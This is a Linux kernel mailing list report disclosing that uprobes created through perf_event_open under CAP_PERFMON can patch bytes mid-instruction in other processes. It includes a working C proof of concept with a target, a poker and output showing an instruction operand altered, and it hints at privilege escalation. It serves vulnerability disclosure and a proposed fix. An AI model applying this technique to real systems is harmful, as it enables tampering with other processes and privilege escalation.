uprobes are destructive but exposed by perf under CAP_PERFMON
From: Jann Horn
Date: Tue Jul 01 2025 - 12:16:41 EST
Since commit c9e0924e5c2b ("perf/core: open access to probes for
CAP_PERFMON privileged process"), it is possible to create uprobes
through perf_event_open() when the caller has CAP_PERFMON. uprobes can
have destructive effects, while my understanding is that CAP_PERFMON
is supposed to only let you _read_ stuff (like registers and stack
memory) from other processes, but not modify their execution.
uprobes (at least on x86) can be destructive because they have no
protection against poking in the middle of an instruction; basically
as long as the kernel manages to decode the instruction bytes at the
caller-specified offset as a relocatable instruction, a breakpoint
instruction can be installed at that offset.
This means uprobes can be used to alter what happens in another
process. It would probably be a good idea to go back to requiring
CAP_SYS_ADMIN for installing uprobes, unless we can get to a point
where the kernel can prove that the software breakpoint poke cannot
break the target process. (Which seems harder than doing it for
kprobe, since kprobe can at least rely on symbols to figure out where
a function starts...)
As a small example, in one terminal:
```
jannh@horn:~/test/perfmon-uprobepoke$ cat target.c
#include <unistd.h>
#include <stdio.h>
__attribute__((noinline))
void bar(unsigned long value) {
printf("bar(0x%lx)\n", value);
}
__attribute__((noinline))
void foo(unsigned long value) {
value += 0x90909090;
bar(value);
}
void (*foo_ptr)(unsigned long value) = foo;
int main(void) {
while (1) {
printf("byte 1 of foo(): 0x%hhx\n", ((volatile unsigned char
*)(void*)foo)[1]);
foo_ptr(0);
sleep(1);
}
}
jannh@horn:~/test/perfmon-uprobepoke$ gcc -o target target.c -O3
jannh@horn:~/test/perfmon-uprobepoke$ objdump --disassemble=foo target
[...]
00000000000011b0 <foo>:
11b0: b8 90 90 90 90 mov $0x90909090,%eax
11b5: 48 01 c7 add %rax,%rdi
11b8: eb d6 jmp 1190 <bar>
[...]
jannh@horn:~/test/perfmon-uprobepoke$ ./target
byte 1 of foo(): 0x90
bar(0x90909090)
byte 1 of foo(): 0x90
bar(0x90909090)
byte 1 of foo(): 0x90
bar(0x90909090)
byte 1 of foo(): 0x90
bar(0x90909090)
```
and in another terminal:
```
jannh@horn:~/test/perfmon-uprobepoke$ cat poke.c
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <err.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <linux/perf_event.h>
int main(void) {
int uprobe_type;
FILE *uprobe_type_file =
fopen("/sys/bus/event_source/devices/uprobe/type", "r");
if (uprobe_type_file == NULL)
err(1, "fopen uprobe type");
if (fscanf(uprobe_type_file, "%d", &uprobe_type) != 1)
errx(1, "read uprobe type");
fclose(uprobe_type_file);
printf("uprobe type is %d\n", uprobe_type);
unsigned long target_off;
FILE *pof = popen("nm target | grep ' foo$' | cut -d' ' -f1", "r");
if (!pof)
err(1, "popen nm");
if (fscanf(pof, "%lx", &target_off) != 1)
errx(1, "read target offset");
pclose(pof);
target_off += 1;
printf("will poke at 0x%lx\n", target_off);
struct perf_event_attr attr = {
.type = uprobe_type,
.size = sizeof(struct perf_event_attr),
.sample_period = 100000,
.sample_type = PERF_SAMPLE_IP,
.uprobe_path = (unsigned long)"target",
.probe_offset = target_off
};
int perf_fd = syscall(__NR_perf_event_open, &attr, -1, 0, -1, 0);
if (perf_fd == -1)
err(1, "perf_event_open");
char *map = mmap(NULL, 0x11000, PROT_READ, MAP_SHARED, perf_fd, 0);
if (map == MAP_FAILED)
err(1, "mmap error");
printf("mmap success\n");
while (1) pause();
jannh@horn:~/test/perfmon-uprobepoke$ gcc -o poke poke.c -Wall
jannh@horn:~/test/perfmon-uprobepoke$ sudo setcap cap_perfmon+pe poke
jannh@horn:~/test/perfmon-uprobepoke$ ./poke
uprobe type is 9
will poke at 0x11b1
mmap success
```
This results in the first terminal changing output as follows, showing
that 0xcc was written into the middle of the "mov" instruction,
modifying its immediate operand:
```
byte 1 of foo(): 0x90
bar(0x90909090)
byte 1 of foo(): 0x90
bar(0x90909090)
byte 1 of foo(): 0x90
bar(0x90909090)
byte 1 of foo(): 0xcc
bar(0x909090cc)
byte 1 of foo(): 0xcc
bar(0x909090cc)
```
It's probably possible to turn this into a privilege escalation by
doing things like clobbering part of the distance of a jump or call
instruction.